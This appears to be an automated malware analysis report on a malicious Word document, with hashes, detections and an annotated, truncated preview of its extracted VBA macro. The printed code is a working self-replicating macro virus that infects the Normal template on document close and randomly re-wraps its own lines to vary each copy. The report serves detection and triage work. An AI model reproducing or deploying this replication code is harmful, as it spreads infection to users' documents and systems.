Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9dd5dea0a2190e95…

MALICIOUS

Office (OLE)

43.5 KB Created: 2000-01-11 21:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 73105d437457c4a78b1fba59da7a8d20 SHA-1: 0d4f3048e53a07ba128844f28299c16892cde4e7 SHA-256: 9dd5dea0a2190e95df75e5f6d4e81c18bb05e1e2792fc181fd42f46c544f1956
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

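The sample is a Microsoft Word document containing VBA macros. The 'OLE_VBA_SHELL' heuristic fired, which indicates use of the Shell() function; Shell() is commonly used to execute arbitrary commands or to download additional payloads. The presence of VBA macros together with Shell() strongly suggests a macro-based malware delivery mechanism, likely initiated via spearphishing. Note that the portion of the extracted macro previewed on this page does not contain the Shell() call. What it does show is a Document_Close handler that copies the macro code between the active document and the Normal template through the VBProject object model, which is self-replicating macro-virus behaviour.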

Heuristics 3

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21447 bytes
SHA-256: 3739e6a44616f51c2be42e6f036ef019412388ad6cde31bc9c181c9b4d3172c4
Detection
ClamAV: Doc.Trojan.Ded-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
            ' Document_New: Word event procedure in the ThisDocument module.
            ' The body is empty, so this handler runs no code of its own.
            Private Sub _
Document_New()

       End Sub
'36.40187
              ' Document_Close: Word event procedure that runs when the document is closed.
              ' In the visible part of the listing it is the only caller of SWL and ABS99,
              ' the two routines that copy this module's code between the active document
              ' and the Normal template.
              Private Sub _
Document_Close()

' Any runtime error jumps to the skam label, which sits directly before End Sub,
' so a failure in SWL or ABS99 ends the handler without an error dialog.
    On Error GoTo skam
'38.20107
' Writes True to Word's Options.VirusProtection setting.
' NOTE(review): why the sample writes True here cannot be determined from this excerpt.
      Options. _
                             VirusProtection = True

' SWL copies code from the Normal template into the active document.
   SWL
'63.31789
' ABS99 copies code from the active document into the Normal template.
   ABS99
'90.57298
skam:
'63.17424
        End Sub
'2.26292
    ' SWL: copies the macro code from the Normal template's first VBA component into
    ' the active document's first VBA component, then saves the document.
    ' It does nothing if the active document already contains "Document_Close".
    ' Analyst note: NormalTemplate/ActiveDocument .VBProject access combined with
    ' CodeModule.InsertLines is a strong static indicator of self-replicating macro code.
    ' In current Office versions this access is refused unless "Trust access to the
    ' VBA project object model" is enabled.
    Private _
Sub SWL()

' Hides the Visual Basic editor window.
  Application. _
                                     ShowVisualBasicEditor = False

' Marker check: searches lines 1-1000 of the active document's first component for
' "Document_Close". The copy below runs only when the string is not found.
     If _
Not ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

' Walks every line of the Normal template's first component.
For I = 1 To NormalTemplate.VBProject.VBComponents(1). _
      CodeModule.CountOfLines

           d = _
NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

' Skips empty lines, a lone space, a lone " _" and lines starting with an apostrophe
' (comments), so the numeric comments in this listing are not carried over by this loop.
 If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

' While the line ends in " _", drops the trailing underscore and appends the next
' source line, rebuilding one logical statement. I is advanced inside the For loop.
     While _
Mid(d, Len(d) - 1, 2) = " _"

   I _
= I + 1

        d = _
Left(d, Len(d) - 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

            Wend
'84.72455
' e is the Function defined further down in this listing (cut off on this page).
' Its visible part trims the line, swaps the names "Sub Vc()" and "Sub ViewVBCode()",
' and at random positions splits the line with " _" plus a carriage return and
' prepends a random number of spaces, so each copy is laid out differently.
       d = _
e(d)

' Inserts the rewritten line into the active document's first component at line I * 2.
    ActiveDocument. _
                                   VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

             End If
'36.34587
           Next _
I

' Saves the modified document without adding it to the recent-files list.
        ActiveDocument. _
                                                   SaveAs AddToRecentFiles:=False

           End If
'90.30988
              End Sub
'27.52955
   ' ABS99: counterpart of SWL in the opposite direction. It copies the macro code
   ' from the active document's first VBA component into the Normal template's first
   ' VBA component, then saves the template.
   ' It does nothing if the Normal template already contains "Document_Close".
   ' Analyst note: code written into the Normal template persists beyond this document,
   ' so check the template's VBA project when triaging a host that opened this sample.
   Private Sub ABS99()
'97.29667
' Marker check: searches lines 1-1000 of the Normal template's first component for
' "Document_Close". The copy below runs only when the string is not found.
           If Not NormalTemplate. _
      VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

' Calls f with the Normal template's full path.
' NOTE(review): f is not defined in the part of the listing visible on this page;
' review it in the full macros.bas to learn what it does with the template file.
 f (NormalTemplate. _
                      FullName)

' Walks every line of the active document's first component.
  For _
I = 1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

    d _
= ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

' Skips empty lines, a lone space, a lone " _" and lines starting with an apostrophe (comments).
   If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

' While the line ends in " _", drops the trailing underscore and appends the next
' source line, rebuilding one logical statement. I is advanced inside the For loop.
             While _
Mid(d, Len(d) - 1, 2) = " _"

            I = I + 1
'74.23421
             d = Left(d, Len(d) - _
1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

      Wend
'7.495034
' e is the Function defined further down in this listing (cut off on this page).
' Its visible part re-wraps the line with randomly placed " _" breaks and leading spaces.
       d = _
e(d)

' Inserts the rewritten line into the Normal template's first component at line I * 2.
  NormalTemplate. _
VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

 End _
If

Next I
'47.13914
' Writes the modified Normal template to disk.
           NormalTemplate.Save
'82.7899
            End _
If

        End _
Sub

            Private Function e(aString) As _
String

       aString = LTrim(aString)
'26.80438
              aString = _
RTrim(aString)

         If _
aString = "Sub " & "Vc()" Then

           aString _
= "Sub " & "ViewVBCode()"

         Else
'31.18372
    If aString = "Sub " & "ViewVBCode()" Then
'45.09994
           aString _
= "Sub " & "Vc()"

   End If
'6.985104
   End If
'92.54505
   For I = 1 To _
Len(aString) - 1

           If Mid(aString, I, 1) _
= "." Then

      If Not Mid(aString, _
I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

              If Not _
Mid(aString, I + 1, 1) = Chr$(34) Then

         e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)

        For _
j = 1 To Int(15 * Rnd)

     e = " " & _
e

  Next j
'37.77427
             Exit Function
'4.393273
       End If
'20.96745
     End _
If

         Else
'53.82507
 If Mid(aString, I, _
1) = " " And Int(3 * Rnd) = 1 And I > 1 Then

         If Not Mid(aString, _
I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then

         e = Left(aString, I _
- 1) & " _" & Chr$(13) & Right(aString, Len(aString) - I)

            For _
j = 1 To Int(15 * Rnd)

         e = " " & _
e

     Next j
'29.1052
      Exit Function
'76.98775
        End If
'17.76208
 End If
'43.15423
 End _
If

       Next I
'41.63005
      e _

... (truncated)